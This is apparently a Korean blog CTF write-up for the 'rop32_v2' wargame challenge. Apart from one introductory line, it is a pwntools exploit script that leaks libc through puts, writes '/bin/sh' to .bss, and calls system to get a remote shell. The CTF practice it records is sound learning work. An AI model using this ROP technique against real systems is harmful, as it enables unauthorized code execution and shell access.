rop32 문제에서 버퍼 크기와 함수만 달라졌습니다.
from pwn import *
context.log_level = 'debug'
e = ELF('./rop32_v2')
p = remote("sunrin.site", 9004)
libc = ELF('./libc.so.6')
pret = 0x080486bb
pppret = 0x080486b9
payload = 'A' * (0x24 + 4)
payload += p32(e.plt['puts'])
payload += p32(pret)
payload += p32(e.got['puts'])
payload += p32(e.sym['vuln'])
p.sendlineafter(": \n", payload)
puts = u32(p.recvuntil('\xf7'))
base = puts - libc.sym['puts']
system = base + libc.sym['system']
binsh = e.bss() + 0x10
payload = 'A' * (0x24 + 4)
payload += p32(e.plt['read'])
payload += p32(pppret)
payload += p32(0)
payload += p32(binsh)
payload += p32(0x20)
payload += p32(e.sym['vuln'])
p.sendline(payload)
p.sendline('/bin/sh\x00')
payload = 'A' * (0x24 + 4)
payload += p32(system)
payload += 'A' * 4
payload += p32(binsh)
p.sendline(payload)
p.interactive()728x90
'해킹 > writeup' 카테고리의 다른 글
| 19. sung.pw - rop64_v2 (0) | 2021.08.01 |
|---|---|
| 18. sung.pw - ropasaurusrex (0) | 2021.08.01 |
| 16. sung.pw - rop32 (0) | 2021.08.01 |
| 15. Dreamhack - basic_rop_x64 (0) | 2021.08.01 |
| 14. Dreamhack - basic_rop_x86 (0) | 2021.08.01 |